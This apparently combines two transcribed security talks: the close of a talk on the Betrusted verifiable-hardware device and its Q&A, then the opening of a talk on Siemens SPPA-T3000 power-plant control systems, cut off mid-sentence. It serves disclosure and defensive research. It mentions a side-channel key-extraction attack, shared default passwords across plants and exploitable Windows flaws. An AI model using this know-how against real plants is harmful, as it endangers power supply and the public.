or like a crypto wallet if you want. And the people we're thinking about who might be users are either high value targets politically or financially, so you don't have to have a lot of money to be a high value target, you could also be very politically risky for some people. And also of course looking at developers and enthusiasts and ideally we're thinking about a global demographic, not just English speaking users which is sort of a thing, when you think about the complexity standpoint this is where we really have to sort of champ at the bit and figure out how to solve a lot of hard problems like getting Unicode and right to left rendering and pictographic fonts to work inside a very small tax surface device. So this leads me to the second point which we need to verify entire systems is not just components. You'll say well why don't you just build a chip? Why not, you know, why are you thinking about a whole device? The problem is that private keys are not your private matters. Screens can be scraped and keyboards can be logged. So there's some efforts now to build wonderful security enclaves like Keystone and OpenTitan which will build wonderful secure chips. The problem is that even if you manage to keep your keys secret you still have to get that information through an insecure CPU from the screen to the keyboard and so forth. And so people who have used these on screen touch keyboards have probably seen a message like this saying that by the way this keyboard can see everything you're typing including your passwords and people probably clip and say oh yeah sure whatever I trust that. Well this little enclave on the site here isn't really doing a lot of good when you go ahead and you say sure I'll run this input method that can go ahead and modify all my data or intercept all my data. So in terms of making a device variable let's talk about the concept of practice flow. How do I take these three principles and turn them into something? So this is the ideal of taking these three requirements and turning it into the set of five features, a physical keyboard, a black and white LCD, an FPGA based RISC-5 SOC, user-seable keys and something that's easy to verify and physically protect. So let's talk about these features one by one. First one is a physical keyboard. Why am I using a physical keyboard and not a virtual keyboard? People love the virtual keyboards. The problem is that cap touch screens which is necessary to do a good virtual keyboard have a firmware block. They have a microcontroller to do the touch screen. It's actually really hard to build these things. If you can do a good Java and build an open source one that'd be great but that's a project in and of itself. So in order to sort of get an easy one here and we can let's just go with a physical keyboard. So this is what the device looks like with this cover off. We have a physical keyboard PCB with a little overlay that does you know so you can do multi-lingual inserts and you just can go ahead and change that out. And it's just a two-layer daughter card. Just hold up to the light and you're like okay, switches, wires, right? Not a lot of places to hide things. So I'll take that as an easy win for an input surface that's verifiable, right? The output surface is a little more subtle so we're doing a black and white LCD. If you say okay, why not use a color LCD? If you ever take apart a liquid crystal display, look for a tiny little thin rectangle sort of located near the display area. That's actually a silicon chip that's bonded to the glass. That's what it looks like at the other day. That contains a frame buffer and a command interface. It has millions of transitions on the inside and you don't know what it does. So if you're already assuming your adversary may be tamping with your CPU, this is also a viable place you have to worry about. So I found a screen. It's called a memory LCD by Sharp Electronics. It turns out they do all the drive electronics on glass. So this is a picture of the drive electronics on the screen through like a 50X microscope with a bright light behind it. You can actually see the transistors that are used to drive everything on the display. It's a non-destructive method of verification. But actually more important to the point is that there are so few places to hide things you probably don't need to check it. If you wanted to add an implant to this, you would need to grow the glass area substantially or add a silicon chip, which is a thing that you'll notice. So at the end of the day, the less places to hide things is less need to check things. So I can feel like this is a screen where I can write data to and it will show what I want to show. The good news is that the display has a 200-pPI pixel density. So even though it's black and white, it's closer to e-paper, e-PD, in terms of resolution. So now we come to the hard part, the CPU, the silicon problem. Any chip built in the last two decades is not going to be fully inspectable with an optical microscope. Right? Thorough analysis requires removing layers and layers of metal and dielectric. This is sort of a cross-section of a modern-ish chip. You can see the huge stack of things to look at on this. This process is destructive and you can think of it as hashing, but it's a little bit too literal. We want something where we can check the thing that we're going to use and then not destroy it. So I spent quite a bit of time thinking about options for non-destructive silicon verification to best come up with maybe using optical felt induction somehow, combined with some chip design techniques to go ahead and scan a laser across and look at fault syndromes and figure out, you know, does the thing do the gates that we put down correspond to the thing that I built. The problem is I couldn't think of a strategy to do it that wouldn't take years and tens of millions of dollars to develop, which puts it a little bit far out there and probably in the realm of venture-funded activities, which is not really going to be very empowering of everyday people. So I want something a little more short-term than that, than this sort of platonic ideal of verifiability. So the compromise that arrived at is the FPGA. So field-programmed gate arrays, that's what FPGA stands for, are large arrays of logic and wires that are user-configured to implement hardware designs. So this here is an image inside an FPGA design tool. On the top right is an example of one sort of logic subcell. It's got a few flip-flops and lookup tables in it, and it's embedded in this huge mass of wires that allow you to wire it up at runtime to figure out what's going on. And one thing that this diagram here shows is I'm able to sort of correlate design. I can see, okay, decode to XU instruction register bit 26 corresponds to this net. So now we're sort of like bringing that time of check a little bit closer to the time of use. And so the idea is to narrow that talk to gap by compiling your own CPU. We can basically give you the CPU from source, you can compile it yourself, you can confirm the bit stream. So now we're sort of enabling a bit more of that trust transfer-like software, right? But there's a subtlety in that the tool chains are not necessarily always open. There's some FOSS flows, like Simba flow. They have a 100% open flow for Iced 40 and ECP5. And there's like seven series where they have a coming soon status, but they currently require some close vendor tools. So picking an FPGA is a difficult choice. There's a usability versus verification trade off here. The big usability issue is battery life. If we're going for a mobile device, you want to use it all day long or you want to be dead by noon, it turns out that the best sort of chip in terms of battery life is a Spartan 7. It gives you 4X, roughly 3 to 4X in terms of battery life. But the tool flow is still semi-closed. But I am optimistic that Simba flow will get there. And we can also fork and make an ECP5 version if that's a problem at the end of the day. So let's talk a little bit more about sort of FPGA features. So one thing I like to say about FPGAs is they offer sort of ASLR, sort of address-based layout randomization, but for hardware. Essentially a design has a kind of pseudo random mapping to the device. This is a sort of a screenshot of two compilation runs of the same source code with a very small modification to it and basically a version number stored in a GPR. And then you can see that actually the locations of a lot of the registers have basically shifted around. The reason why this is important is because this hinders a significant class of silicon attacks. All those small mass level changes. I talked about the ones where we just say, okay, we're just going to change a few wires or run a couple logic cells around, those become more less likely to capture a critical bit. So if you want to go ahead and backdoor a full FPGA, you're going to have to change the die size. You have to make it substantially larger to be able to sort of like swap out the function in those cases. And so now the verification bar goes from looking for a needle in a haystack to measuring the size of the haystack, which is a bit easier to do towards the user side of things. And it turns out at least in Xilinx land, it's just a change in random parameter does a trick. So some potential attack vectors against FPGAs is like, okay, well, it's closed silicon. What are the backdoors there? Notably inside a seven series FPGAs, they actually document introspection features you can pull out anything inside the chip by instantiating a certain special block. And then we still also have to worry about the whole class of like man in the middle IO and JTAG implants that I talked about earlier. So this easy, really easy to mitigate the known blocks, basically lock them down, tie them down, check them in the bit stream, right? In terms of the IO man in the middle stuff, this is where we're talking about like someone goes ahead and puts a chip in the path of your FPGA. There's a few tricks we can do. We can do sort of bus encryption on the RAM and the ROM at the design level that frustrates these. At the implementation, basically we can use the fact that data pins and address pins can be permuted without affecting the devices function. So every design can go ahead and permute those data and address pin mappings sort of uniquely. So any particular implant that goes in will have to be able to compensate for all those combinations making the implant a little more difficult to do. And of course, we all can always fall back to sort of careful inspection of the device. In terms of the closed source silicon, the thing that I'm really optimistic for there is that so in terms of closed source system, the thing we have to worry about is that for example, now that Xilinx knows that we're doing these trustable devices using a tool chain, they push a patch that compiles backdoors into your bit stream. So not even a silicon level implant, but maybe the tool chain itself has a backdoor that recognizes that we're doing this. So the cool thing is in a very, this is a cool project, so there's a project called PRJ, actually Project Xray. It's part of the Symbolful effort. And they're actually documenting the full bit stream of the seven series device. It turns out that we don't yet know all the bit functions are, but the bit mappings are deterministic. So someone were to try and activate a backdoor in the bit stream through compilation. We can see it in a diff. We'd be like, well, we've never seen this bit flip before. What does this do? We can look into it and figure out if it's malicious or not. So there's actually sort of a hope that essentially at the end of the day, we can build sort of a bit stream checker. We can build a thing that says, here's a bit stream that came out. Does it correlate to the design source? Do all the bits check out? Do they make sense? And so ideally, we would come up with like a one click tool. And now we're at the point where the point of check is very close to the point of use. The users are now confirming that the CPUs are correctly constructed and mapped to the FPGA correctly. So the summary of FPGA versus custom silicon is sort of like the pros of custom silicon is that they have great performance. We can do a true single chip enclave with hundreds of megahertz speeds and tiny power consumption, but the con of silicon is that it's really hard to verify. So open source doesn't help that verification and hard IP blocks are tough problems we talked about earlier. So FPGAs on the other side, they offer some immediate mitigation paths. We don't have to wait until we solve this verification problem. We can inspect a bit streams. We can randomize the logic mapping. And we can do per device unique pin mapping. It's not perfect, but it's better than, I think, anything other solution I can offer right now. The cons of it is that the FPGAs are just barely good enough to do this today. So you need a little bit of external RAM, which needs to be encrypted, about 100 megahertz speed performance, and about 5 to 10 X the power consumption of a custom silicon solution, which in a mobile device is a lot, but we actually, part of the reason, the main thing that drives the thickness in this is the battery, right? And most of that battery is for the FPGA. If we didn't have to go with an FPGA, it could be much, much thinner. So now let's talk a little about the last two points, user feeble keys and verification and protection. And this is that third point, empowering end users to verify and seal their hardware. So it's great that we can verify something, but can it keep a secret? Transparency is good up to a point, but you want to be able to keep secrets so that people just welcome and say, oh, there's your keys, right? So sealing a key in the FPGA, ideally we want user generated keys that are hard to extract. We don't rely on a central key authority, and that any attack to remove those keys should be noticeable, right? So any high level apps, I mean, someone like infinite funding basically, should take about a day to extract it, and that effort should be trivially evident. The solution to that is basically self provisioning and sealing of the cryptographic keys in the bit stream and a bit of epoxy. So let's talk a little bit about, you know, sort of provisioning those keys. If we look at the seven series FPGA security, they offer sort of encrypted HMAC 256AS with 256 SHA bit streams. There's a paper which discloses a known weakness as it, so it's about, it takes, the, the attack takes about a day, 1.6 million chosen Cypher text traces. The reason why it takes a day is because that's how long it takes to load in that many chosen Cypher text through the, through the interfaces. The good news is there's some easy mitigations to this. You can just glue shut the JTAG port or improve your power filtering, and that should significantly complicate the attack. But the point is that it will take a fixed amount of time to do this, and you have to have direct access to the hardware. It's not the sort of thing that, you know, someone that customs or like an evil maid could easily pull off. And just to put that in perspective again, if, even if we improved dramatically the DPA resistance of the hardware, if we knew a region of the chip that we want to inspect, probably with a SEM and a, and a skill technician, we could probably pull it off in a matter of a day or a couple of days, takes only an hour to decap the silicon, you know, an hour or a few layers, a few hours in a fib to delay our chip in an afternoon in the SEM, and you can find out the keys, right? So, so, but the key point is that this is kind of the level that we've agreed is, is okay for, for, for a lot of the, the silicon enclaves, and this is not going to happen at a customs checkpoint or by an evil maid, so I think I'm, I'm okay with that for now. We can do better, but I think that's a, it's a good starting point, particularly for something that's so cheap and accessible. So then how do we get those keys in FPGA and how do you keep them from getting out? So those keys should be user generated, never leave the device, not accessible by the CPU after it's provisioned, unique per device, and it should be easy for the user to get it right. So you don't have to know all the stuff and type a bunch of commands to do it right, right? So if you look inside, be trusted. We have, there's two rectangles there. One of them is the ROM that contains the bitstream, and the other one's the FPGA. So I'm going to draw those in a schematic form. Inside the ROM, you start the day with an unencrypted bitstream in ROM, which loads in the FPGA, and then you have this little crypto engine that has no keys on the inside, there's no, there's no keys anywhere. So you can check everything, you can build your own bitstream, you can do what you want to do. The crypto engine then generates keys from a TRNG that's located on chip, probably some help with some off-chip randomness as well, because I don't necessarily trust everything inside the FPGA. Then that crypto engine can go ahead and as it encrypts the external bitstream, inject those keys back into the bitstream, because we know where that block RAM is. We can go ahead and inject those keys back into that specific RAM block as we encrypt it. So we have a sealed encrypted image on the ROM, which can then load, literally load in the FPGA if it had the key. So after you've gone ahead and provisioned the ROM, hopefully at this point you don't lose power, you go ahead and you burn the key into the FPGA's key engine, which sets it to only boot from that encrypted bitstream, blow out the, re-back the disabled bit and AS-only bit is blown. So now at this point in time, basically there's no way to go ahead and put in a bitstream that says, tell me your keys, whatever it is. You have to go do one of these hard techniques to pull out the key. You can maybe enable Hardware Upgrade Path if you want by having the crypto engines be able to retain a copy of the master key and re-encrypt it, but that becomes a vulnerability because the user can be coerced to go ahead and load inside a bitstream that then leaks out the keys. So if you're really paranoid at some point in time, you seal this thing and it's like done. You have to go ahead and do that full key extraction routine to go ahead and pull stuff out. If you forget your passwords. So that's the sort of user-sealable keys. I think we can do that with an FPGA. Finally easy to verify and easy to protect. Just very quickly talking about this. So if you want to make an inspectable tamper barrier, a lot of people have talked about glitter seals. Those are pretty cool, right? The problem is I find that glitter seals are too hard to verify, right? Like I have tried glitter seals before and I stared the thing and I'm like, damn it, I have no idea if this is the seal I put down. And so then say, okay, we'll take a picture or write an app or something. Now I'm relying on this untrusted device to go ahead and tell me if the seal is verified or not. So I have a suggestion for a DIY watermark that relies not on an app to go ahead and verify, but our very, very well-tuned neural networks inside our head to go ahead and verify things. So the idea is basically there's this nice epoxy that I found. It comes in this by-pack. It's a two-party epoxy. You just put it on the edge of the table and you go like this and it goes ahead and mixes the epoxy and you're ready to use. So it's very easy for users to apply. And then you just draw a watermark on a piece of tissue paper. It turns out humans are really good at identifying our own handwriting, right? Our own signatures, these types of things. Someone can go ahead and try to forge it. There's people who are skilled in doing this, but this is way easier than looking at a glitter seal. You go ahead and put that down on your device. You swab on the epoxy and at the end of the day you end up with a sort of tissue paper plus a very easily recognizable seal. Someone goes ahead and tries to take this off or tamper with it. I can look at it easy and say, yes, this is a different thing than what I had yesterday. I don't have to open an app. I don't have to look at glitter patterns. I don't have to do these sorts of things. And I can go ahead and swab on to all the IO ports they need to do. So it's a bit of a hack, but I think that it's a little closer towards not having to rely on third-party apps to verify a tamper evidence seal. So I've talked about sort of this implementation and also talked about how it maps to these three principles for building trustable hardware. So the idea is trying to build a system that is not too complex so that we can verify most of the parts or all of them at the end user point, look at the keyboard, look at the display, and we can go ahead and compile the FPGA from source. We're focusing on verifying the entire system end to end, so the keyboard and the display. We're not forgetting the user. The secrets start with the user and end with the user, not at the edge of the silicon. And finally, we're impiring end users to verify and seal their own hardware so you don't have to go to a central keying authority to go ahead and make sure your secrets are inside your hardware. So at the end of the day, the idea behind BeTrusted is to close that hardware time of check time of use gap by moving the verification point closer to the point of use. So in this huge complicated landscape of problems that we can have, the idea is that we want to as much as possible teach users to verify their own stuff. So by design, it's meant to be a thing that hopefully anyone can be taught to sort of verify and use and we can provide tools that enable them to do that. But if that ends up being too hard of a bar, I would like it to within one or two nodes in your immediate social network, anyone in the world can find someone who can do this. And the reason why I set this bar is I want to define the maximum level of technical competence required to do this. Because it's really easy, particularly sitting in an audience of this of really brilliant technical people, say, of course, everyone can just hash things and compile things and look at things on microscopes and solder it. And then you get into life and reality and like, oh, wait, I have completely forgotten what real people are like. So this tries to get me grounded and make sure that I'm not sort of drinking my own Kool-Aid in terms of how useful open hardware is as a mechanism to verify anything. Because a bunch of people schematic and say, check this, but you're like, I have no idea. So the current development status is that the hardware is kind of an initial EVT stage for a type subject to significant change, particularly part of the reason we're here talking about this is to collect more ideas and feedback on this, make sure we're doing it right. The software is just starting. We're writing our own OS called Zeus being done by Sean Cross. And we're exploring the UX and applications being done by Tom Marble shown here. And I actually want to give a big shout out to Enelnet for funding us partially. We have a couple of grants for underprivacy and trust enhancing technologies. And this is really significant because now we can actually think about the hard problems and not have to be like, oh, when do we go crowdfunded? When do we go fundraise? Like a lot of people are just like, oh, this looks like a product, right? Can we sell this now? It's not ready yet, right? And I want to be able to take the time to talk about it, listen to people, incorporate changes, and make sure we're doing the right thing. So with that, I'd like to open up the floor for Q&A. Thanks everyone for coming to my talk. Thank you so much, Bani, for the great talk. We have about five minutes left for Q&A. For those who are leaving earlier, you're only supposed to use the two doors on the left, not the one, not the tunnel you came in through, but only the doors on the left, like the very left door and the door in the middle. Now Q&A, you can pile up at the microphones. Do we have a question from the internet? No, not yet. If someone wants to ask a question but is not present, but in the stream or maybe a person in the room who wants to ask a question, you can use the hashtag Clark and Twitter, Masterland, and IRC are being monitored. So let's start with microphone number one. Your question, please. Hey, Bani. Hey. So you mentioned that with the Foundry process that the hard IP blocks, the proprietary IP blocks were a place where attacks could be made. Do you have the same concern about the hard IP blocks in the FPGA, either the embedded block RAM or any of the other special features that you might be using? Yeah, I think that we do have to be concerned about implants that have existed inside the FPGA prior to this project, right? I think there is a risk, for example, that there's a JTAG path we didn't know about. But the other, I guess the compensating side is that the military, US military does use a lot of these in their devices. So they have a self-interest in not having backdoors inside of these things as well, is sort of, we'll see. I think that the answer is it's possible. I think the upside is that because the FPGA is actually a very regular structure, it's doing sort of a sem level analysis of the initial construction of it at least is not insane. We can identify these blocks and look at them and make sure they're the right number of bits. That doesn't mean the one you have today is the same one. But if they were to go ahead and modify that block to do sort of the implant, my argument is that because of the randomness of the wiring and the number of factors they have to consider, they would have to actually grow the silicon area substantially and that's a thing that is a proxy for detection of these types of problems. So that would be my kind of half answer to that problem. It's a good question though. Thank you. Yeah, thanks for the question. Next one for microphone number three, please. Hi. Yeah, move close to the microphone. Thanks. Hello. My question is in your proposed solution, how do you get around the fact that the attacker, whether it's an implant or something else, will just attack it before the user's self-provisioning? So it'll compromise the self-provisioning process itself. Right. So the idea of the self-provisioning process is that is that... So we send the device to you, you can look at the circuit boards and devices and then you compile your own FPGA, which includes the self-provisioning code from source and you can confirm... Or if you don't want to compile, you can confirm that the signatures match with what's on the internet. Right. And so if someone wanted to go ahead and compromise that process and sort of stash away some keys in some other place, that modification would either be evident in the bit stream or that it would be evident as a modification of the hash of the code that's running on it at that point in time. So someone would have to then add a harder implant, for example, to the ROM, but that doesn't help because it's already encrypted by the time it hits the ROM, so it really has to be an implant that's inside the FPGA and then Traml's question just sort of talked about that situation itself. So I think the attack surface is limited at least for that. So you talked about how the courier might be the hacker, right? So in this case, the courier would put a hard-core implant not in the hard IP, but just in the piece of hardware inside the FPGA that provisions the bit stream. So the idea is that you would get that FPGA and you would blow your own FPGA bit stream yourself. You don't trust my factory to give you a bit stream. You get the device... You trust that the bit stream is being blown. You just get indicated on your computer saying this bit stream is being blown, right? I see. I see. So how do you trust that the ROM actually doesn't have a backdoor in itself that's putting another secret bit stream that's not related to... A problem for a courier or evil maid. Yeah, I mean, possible, I guess. I think there are things you can do, for example, to defeat that. So the way that we do the semi-randomness in the compilation is there's a 64-bit random number we compile into the bit stream. So if you're compiling your own bit stream, you can read out that number and see if it matches. At that point, if someone had pre-burned a bit stream onto it that they're sort of using to actually load it instead of your own bit stream, it's not going to be able to have that random number, for example, on the inside. So I think there's ways to tell if, for example, the ROM has been backdoored and it has two copies of the ROM, one of the evil one and one of yours, and then they're going to use the evil one during provisioning, right? I think that's a thing that can be mitigated. All right, thank you very much. We take the very last question from microphone number five. Hi, Bunny. Hi. So one of the options you sort of touched on in the talk but then didn't pursue was this idea of doing some custom silicon in a sort of very low-res process that could be optically inspected directly. Is that completely out of the question in terms of being a usable root in the future or did you look into that in great detail at all? So I thought about that one. There's a couple of issues. One is that if we rely on optical verification, now users need optical verification prior to do it. So we have to somehow move those optical verification tools to the edge towards the time of use, right? So nice thing about the FPGA is everything I talked about, building your own bit stream, inspecting the bit stream, checking the hashes, those are things that don't require particular sort of user equipment. But yes, if we were to go ahead and build like an enclave out of 500 nanometer silicon, like it probably run around 100 megahertz, you'd have a few kilobytes of RAM on the inside, not a lot, right? So you have a limitation in how much capability you have on it and would consume a lot of power. But then every single one of those chips, right, we put them in a black piece of epoxy. How do you, like, you know, what keeps someone from swapping that out with another chip? Yeah, I mean, I was thinking of like old school transparent top like on a little... Oh, okay. So yeah, you can go ahead and wire bond on the board, put some clear epoxy on, and then now people have to take a microscope to look at that. That's a possibility. I think that that's the sort of thing that I think I'm trying to imagine, like for example, my mom using this and asking her to do this sort of stuff. I just don't envision her knowing anyone who would have an optical microscope who could do this except for me, right? And I don't think that's a fair, you know, assessment of what is verifiable by the end user at the end of the day. So maybe for some scenarios it's okay, but I think that the full optical verification of a chip and making that sort of the only thing between you and an implant worries me. And that's the problem with the hard chip is that basically if someone, even if it's full, you know, it's just a clear thing and someone just swapped out the chip with another chip, right, you still need to know, you know, a piece of equipment to check that, right? Whereas like when I talked about the display and the fact that you can look at that, actually the argument for that is not that you have to check the display. It's that you don't, it's actually because it's so simple, you don't need to check the display, right? You don't need the microscope to check it because there's no place to hide anything. All right, folks, we ran out of time. Thank you very much to everyone who asked the question. And please give another big round of applause for our great speaker, Bunny. Thank you so much for the great talk. Thanks, everyone. Thanks, everyone.
While open source is necessary for trustable hardware, it is far from sufficient. This is because “hashing” hardware – verifying its construction down to the transistor level – is typically a destructive process, so trust in hardware is a massive time-of-check/time-of-use (TOCTOU) problem. This talk helps us understand the nature of the TOCTOU problem by providing a brief overview of the supply chain security problem and various classes of hardware implants. We then shift gears to talk about ways to potentially close the TOCTOU gap, concluding with a curated set of verifiable components that we are sharing as an open source mobile communications platform – a kind of combination hardware and software distribution – that we hope can be useful for developing and deploying all manner of open platforms that require a higher level of trust and security. The inconvenient truth is that open source hardware is precisely as trustworthy as closed source hardware. The availability of design source only enables us to agree that the designer’s intent can be trusted and is likely correct, but there is no essential link between the hardware design source and the piece of hardware on your desk. Thus while open source is necessary for trustable hardware, it is far from sufficient. This is quite opposite from the case of open source software thanks to projects like Reproducible Builds, where binaries can be loaded in-memory and cryptographically verified and independently reproduced to ensure a match to the complete and corresponding source of a particular build prior to execution, thus establishing a robust link between the executable and the source. Unfortunately, “hashing” hardware – verifying its construction down to the transistor level – is typically a destructive process, so trust in hardware is a massive time-of-check/time-of-use (TOCTOU) problem. Even if you thoroughly inspect the design source, the factory could modify the design. Even if you audit the factory, the courier delivering the hardware to your desk could insert an implant. Even if you carried the hardware from the factory to your desk, an “evil maid” could modify your machine. This creates an existential crisis for trust – how can we know our secrets are safe if the very hardware we use to compute them could be readily tainted? This talk addresses the elephant in the room by helping us understand the nature of the TOCTOU problem by providing a brief overview of the supply chain security problem and various classes of hardware implants. We then shift gears to talk about ways to potentially close the TOCTOU gap. When thinking about hardening a system against supply chain attacks, every component – from the CPU to the keyboard to the LCD – must be considered in order to defend against implanted screen grabbers and key loggers. At every level, a trade-off exists between complexity and the feasibility of non-destructive end-user verification with minimal tooling: a system simple enough to be readily verified will not have the equivalent compute power or features of a smartphone. However, we believe that a verifiable system should have adequate performance for a select range of tasks that include text chats, cryptocurrency wallets, and voice calls. Certain high-risk individuals such as politicians, journalists, executives, whistleblowers, and activists may be willing to use a device that forgoes bells and whistles in exchange for privacy and security. With this in mind, the <https://betrusted.io>Betrusted project brings together a curated set of verifiable components as an open source mobile communications platform - a combination open source hardware and software distribution. We are sharing Betrusted with the community in the hopes that others may adopt it as a reference design for developing and deploying all manner of open platforms that require a higher level of trust and security.
10.5446/53183 (DOI)
One of the obvious critical infrastructures we have nowadays is power generation. If there's no power, we're pretty much screwed. Our next speakers will take a very close look at common industrial control systems used in power turbines and their shortcomings. So please give a warm round of applause to Reptap, Moradek and Kors. Good morning Congress. Thank you for waking up in the morning. We will talk about the security of power plants today, specifically about automation systems that are used in the power plants. You might think that this is another talk about how insecure the whole industrial things around us are, and more or less it is. So for years we are, we and our colleagues speak about problems in industrial security. We are happy to say that things are getting better, but it's just that the temper is a little bit different and feels a little bit uncomfortable. So anyway, we will speak about how power plants are built, what is the automation inside, what are the vulnerabilities, and the high level overview of what you can do with this. But at first a little bit of introduction. We are security consultants. We work with a lot of industrial things like PLCs, RTUs, SCADES, DCSS, whatever it is. We were doing this for too long. For so long that we have a huge map of contacts with a lot of system integrators and vendors, and throughout the time we are not just doing the consultancy work for some asset owner, for example for a power plant, we also talk to other entities and we try to fix things all together. We work at Kaspersky and actually the whole research was done not just by me, Rado and Alexander who are here, but also with the help of Evgenia and two Sergays. Things, yeah. So things that are very important to note is that everything that we will discuss right now is reported to a respective vendor basically a long time ago. You can see like vendors here, but more or less we will speak only about one vendor today. It is Siemens, but we would like you to understand that similar security issues can be found in all other industrial solutions from other vendors. You would find some of the findings, not for example that seller and it doesn't require like weeks of work to find them out and this would be true specifically for all other vendors which are not mentioned in the talk. Jokes aside, we will share security issues of real power plants out there and it might look like we are kind of irresponsible guys, but in fact this is the other way around. I mean that to do some kind of research with these systems that are working in the power plants you need to get access to them, you need time to do this research, you need to have some knowledge to do this research and all these resources they are limited for guys like us for penetration testers, for auditors, for power plant operators and engineers. But for the bad guys like the potential attackers or adversaries, this is actually their job. They have a lot of investments to do some research. So we assume that bad guys already know this and we would like to share some information with the good guys so they would be able to act upon this. So let's go to the talk itself, power plants. Power plants is like the most common way how humans get their power, their electricity, they are everywhere around us and I believe the closest one to Leipzig is called Lipimdorf power station and during this research when we were preparing an introduction we were surprised how many information about power plants you can get from the internet. It's not just for example a picture of the same power station on the Google Maps, it is a very good scheme of what you can see on the marketing materials from vendors because when they sell some system that automate power plant operations they sometimes start with building construction and on their websites you can find a schematic pictures of actually which building does what and where you will find some equipment, which versions of equipment are used in these systems. But if you don't have this experience you can just Google things and you will find out which systems are used for automation in power plants. For example for Lipimdorf it's some system that is called Siemens SPPAT2000 and P3000 which actually have another Siemens system inside called Siemens SPPAT3000. So it's a little bit confusing and it is and we are still confused. This is exactly the system that we will focus today, the Siemens SPPAT3000 and again it could be any other automation system but it just happened the way that we've seen this system more and more often than others. There is a way how you can actually see all the generation sites throughout the world thanks to the carbon monitoring communities. This is not just power plants, this is also like nuclear sites, wind generation, solar plants etc. And etc. They are all here marked by different fuel types of generation, for example there is a coil and gas power plants marked there. So the topic is really huge and what we will focus today in our talk is mostly the power plants which work on coal and gas. This is important to mention. The heart of each power plant is actually a turbine. We don't have a picture of a turbine on the slides but more or less I think everybody saw it on the airplane. They are very similar specifically in terms of size and mostly how they work. On different vendors' websites you can actually find a lot of information where those turbines are used and this is for example the map of the turbines from Siemens. Not all turbines specifically are used in power plants. So they have a lot of different applications like chemical plants, oil and gas, a lot of other things. But if you correlate this information from previous slides you would be able to identify which systems are used by which power plant and if you will Google more information you can actually tell the versions and the generations of the systems that are used on these power plants. This is important because of the vulnerabilities that we will discuss later on on the slide. So before we will speak about what is the automation on power plants we should understand a little bit how they work. So we will go from right to left and it's very easy. A little notice throughout the talk we will simplify a lot of things for two reasons. One of them to make it more suitable for the audience and another thing we don't really understand everything by ourselves. So the first thing you should get is a fuel. Fuel could be for example a coil or a gas and you will just put this inside the combustion chamber where you would put it, set it up on fire actually and it will generate a lot of pressure which will go to the turbine and because of the pressure the turbine will begin to rotate. The turbine will have a shaft which will drive the electricity generator which obviously will generate electricity and put it on the power grid. So it is important from now on to understand that when we generate some electricity on the power plant we put this power not just for for example for this congress center or for some city we put it in a big thing called power grid where other entities will sell this electricity to different customers. There is also a very interesting point about like when we do generate this pressure and the combustion chamber is on fire we have a lot of excessive heat and we have two options like one of them is to safely put it in the air with condensing towers. This is option number one and another option is we can do some form of recuperation for example we would take this heat we will warm water the water will produce steam and we will put this steam in the steam turbine and produce additional electricity this is kind of an optimization of some form. So what is the automation in this process? The automation systems that are used on the power plants are usually called distributed control systems or DCSs and everything that I just described actually is automated inside those systems. The vendor of the solution want to simplify all things for the operator because we don't want like hundreds of people working on the power plant we just want like maybe dozens of people working there and they want to simplify the whole process of like they don't care about where they get this gas or coal how much they need it they just should be able to stop the generation process started and the control one main thing which is called how much power we should produce to the power grid so like how many megawatts of electricity we should produce. This describes actually the complexity hidden inside these solutions because there are a lot of small things happening inside and we will discuss it a little bit later. As I said this DCSs they are not exclusively used on the power plants there are a lot of other sites that would use the same solutions the same software and hardware. The DCS is not just like a software that you can install it's a set of hardware and software there is input output models sensors etc etc as I said sometimes they start from building construction like there is a field please build us a power station so it's a more complex projects most of the time. There are a lot of vendors that are doing it as I said we are focusing in this talk on the Siemens one. Just a short description of how simplified things are for operators of this DCS software. So for example if we would like to answer the question how we would regulate the output in megawatts of our power plant we would need to control basically three things again we are oversimplifying here. First of all you would control how many this is an example for the gas turbine so we would need to regulate how many gas we would put inside the combustion chamber we would control the flame temperature and we will control the thing that gets air inside the turbine. Basically three things that are controlled by simple PLCs in the whole system and you would be able for example to change 100 megawatts to 150 megawatts based on these settings. So the system itself that we are going to discuss is called Siemens SPPAT 3000 and actually again as all other DCS systems from other vendors this is a typical industrial system it has all these things called PLCs, RTUs, HMI servers, OPC traffic etc. etc. The only thing that is different specifically for Siemens SPPAT 3000 is that they have two main things called application server and automation server that this software running on this server is not what you will find on other installations. Like the fact that there are a lot of like if you would read the manuals for the systems from Siemens there would be a lot of different networks and highways and a lot of things like Siemens would state that there is no connection between the application network and external networks in practice and in reality you will find things like specific sensor network like monitoring of vibration for an object and some noises inside the turbine you will find the demilitarized zone because all in all like all power plant operators they won't have like on-site maintenance guys, engineers they would try to do a remote support they would need to install updates for operating system for their like signatures for their antiviruses they would need to push some OPC traffic so like information about the generation process outside either to corporate network or to some regulator because the whole energy market is regulated and there are different entities who would monitor how many electricity you are generating or they basically will tell you how many electricity you should generate because this is how many electricity was sold on the energy market. Basically the whole talk with this structure like this we will speak first about application server then automation server and then some summary it all started with the process called coordinated vulnerability disclosure we notified Siemens about some issues almost a year ago and like a month at the beginning of December Siemens published an advisory it was not an advisory just from the issues just from us a lot of other teams also contributed to it and this December this year's December doesn't mean that Siemens just released the patches when they the system as the PAT 3000 is exclusively supported so the system integrator for the system is Siemens itself so throughout the year after we notified them about some security issues they started to roll out patches and install updates on critical infrastructure they support and hopefully they did it with all the sensitive issues. There is a lot of things to discuss here we will skip because we are a little bit in a hurry things like not all vulnerabilities are the same and we use for example CVSS here to talk about like how critical the vulnerability is but it's actually not very applicable to the industrial sites you should understand what you can do with each vulnerability how you can impact the process and we will skip this part there's actually a kind of a threat model in the white paper that we will release later on like during January we will hold. So application server application server is this main is a main resource that you would find in the SPAT 3000 network like if someone will remotely connect to the system it would end up in application server if someone wants to start the generation process or to change some values it would be the application server if there are other servers that would for example try to communicate the application server they will actually start their work by downloading their software from application server and then executing it. So the first thing you might notice here is there are a lot of network ports available on this machine and actually this is like the first point there is a huge attack surface for the adversary to choose whether or not he would like to compromise some Siemens software or it's Windows software or it's another third party. Huge attack surface starting from the fact that all of the installation of this SPPA systems are kind of different so depending on the version and the generation you can find different Windows versions from I don't know 2003 to 2016 hopefully they are all updated right now but because the update process for such installations is a hard thing to do I mean you should wait for maintenance and it should be like maybe once in a half year or once a year you will always find some window where you can use some remotely exploitable vulnerabilities like eternal blue or blue keep are mentioned on this slide. There's tons of different additional software like old Cygwin that will allow you to do privilege escalation badly configured Tomcat and we have here this funny pie charts that show how configuration of different software is aligned with the best practices from CIS benchmarks those are basically security configuration hardening guides. The most important thing in the application server is a lot of Java software and in a minute rather will tell you about this. Surprise surprise one of the most notable problems in the Siemens SPPA 3000 is actually passwords. There are three important ranges the first to them is like what's all the installations before 2014 or maybe 2015 all passwords for the for all power stations were the same and you can easily Google them. We will also publish like the full word list in the white paper. After this years Siemens started to generate 